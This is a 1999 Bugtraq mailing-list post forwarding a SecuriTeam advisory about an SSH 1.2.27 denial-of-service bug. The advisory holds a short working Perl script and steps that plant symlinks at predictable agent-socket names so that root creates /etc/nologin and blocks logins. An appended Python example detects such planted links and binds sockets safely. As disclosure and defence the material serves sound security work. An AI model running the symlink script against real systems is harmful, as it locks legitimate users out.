Bugtraq mailing list archives
Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]
From: tymm () COE MISSOURI EDU (Tymm Twillman)
Date: Sun, 26 Sep 1999 16:53:44 -0500
Hi,

This is from a post I made to BugTraq on September 17, entitled "A few bugs...". If you're running Linux, it appears kernels pre 2.1 will not be affected by this bug as they do not follow symlinks when creating UNIX domain sockets (Solar Designer pointed this out after trying the exploit on a 2.0.38 kernel; I tested on a 2.0.34 kernel, and from there I'm generalizing). Other OSes, I'm not really sure; I don't have access to many platforms to test this on.

It seems the SSH folks still haven't addressed this issue... *sigh*.

-Tymm

-- original message follows --

I received this email today and wanted to know if it is something to be of concern about.

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

SSH 1.2.27 vulnerable to a Denial of Service attack
------------------------------------------------------------

SSH has the option of setting up "authentication sockets", used to pass authentication keys securely. When this is used, a socket is created on both client and server machines; the socket created on the server uses an easy to guess filename (based on the PID). The creation of this socket is done while the server is acting as root and follows symlinks.

******************************

Exploit:

- connect to remote machine
- run the following script (creates symlinks for the next 50 PID's):

----- cut -----
#!/usr/bin/perl

$pid = $$;
$whoami = `whoami`;
chop($whoami);

mkdir("/tmp/ssh-$whoami", 0700);

for ($i = $pid; $i < $pid+50; $i++) {
    symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}
----- cut -----

- on local machine, execute ssh-agent1; it will produce a few lines to cut and paste into your shell.
- ssh1 to the remote machine; enter password

The socket will have been created at /etc/nologin, preventing other non-root users from logging in. This connection too will die with "Logins are currently denied by /etc/nologin:"

This was tested on a RedHat 6.0 machine, with standard configure/make/install installation of ssh. This script should work pretty well for systems that create processes where each PID is one greater than the last; other platforms may require modifications, or many-many more links, if they're exploitable.
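The defender's side of the issue above, as an added example that is neither part of the post nor taken from the SSH sources: one function audits a per-user agent directory of the /tmp/ssh-<user> form for pre-planted symlinks (the condition the advisory's script creates), and a second shows the socket-creation pattern that avoids the bug, namely binding only inside a freshly created, unpredictably named, mode 0700 directory that the process owns, after checking with lstat() that nothing already sits at the socket path. The user name "alice", the PID 4242 and the planted /etc/nologin link in build_fixture() are constructed sample data.

```python
"""Defender-side checks for the predictable agent-socket name problem.

Added example (not advisory or SSH code). Assumes the /tmp/ssh-<user>
directory layout the advisory describes; all sample names are constructed.
"""
import os
import socket
import stat
import tempfile


def find_planted_symlinks(base_dir):
    """Return [(path, target)] for every symlink found in base_dir.

    An agent directory should contain nothing but sockets, so any symlink is
    suspicious; the advisory's script plants ssh-<pid>-agent -> /etc/nologin
    so that a root-running server bind()s through it.
    """
    hits = []
    if not os.path.isdir(base_dir):
        return hits
    for name in sorted(os.listdir(base_dir)):
        path = os.path.join(base_dir, name)
        if os.path.islink(path):
            hits.append((path, os.readlink(path)))
    return hits


def create_agent_socket(tmp_root=None):
    """Bind a UNIX-domain socket without following anything pre-planted.

    Returns (socket, path). The directory name is unpredictable (mkdtemp),
    private (0700) and owned by us, so no other user can place a symlink at
    a name we are about to use.
    """
    tmp_root = tmp_root or tempfile.gettempdir()
    sock_dir = tempfile.mkdtemp(prefix="ssh-", dir=tmp_root)
    st = os.lstat(sock_dir)                      # lstat: a symlink would fail S_ISDIR
    if not stat.S_ISDIR(st.st_mode):
        raise RuntimeError("%s is not a directory" % sock_dir)
    if st.st_uid != os.geteuid() or st.st_mode & 0o077:
        raise RuntimeError("%s is not private to this user" % sock_dir)
    sock_path = os.path.join(sock_dir, "agent.%d" % os.getpid())
    # Refuse to bind over any existing entry (file, symlink, socket ...).
    if os.path.lexists(sock_path):
        raise RuntimeError("refusing to bind: %s already exists" % sock_path)
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(sock_path)
    return s, sock_path


def is_real_socket(path):
    """True only if the path itself (not a link target) is a socket inode."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False
    return stat.S_ISSOCK(st.st_mode)


def build_fixture(tmp_root=None):
    """Constructed sample: a user directory with one planted link and one plain file."""
    tmp_root = tmp_root or tempfile.mkdtemp(prefix="fixture-")
    base = os.path.join(tmp_root, "ssh-alice")               # constructed user name
    os.mkdir(base, 0o700)
    os.symlink("/etc/nologin", os.path.join(base, "ssh-4242-agent"))  # planted link
    open(os.path.join(base, "ssh-4243-agent"), "w").close()           # harmless file
    return base


if __name__ == "__main__":
    for path, target in find_planted_symlinks(build_fixture()):
        print("planted symlink: %s -> %s" % (path, target))
    sock, sock_path = create_agent_socket()
    print("bound safely at %s (real socket: %s)" % (sock_path, is_real_socket(sock_path)))
    sock.close()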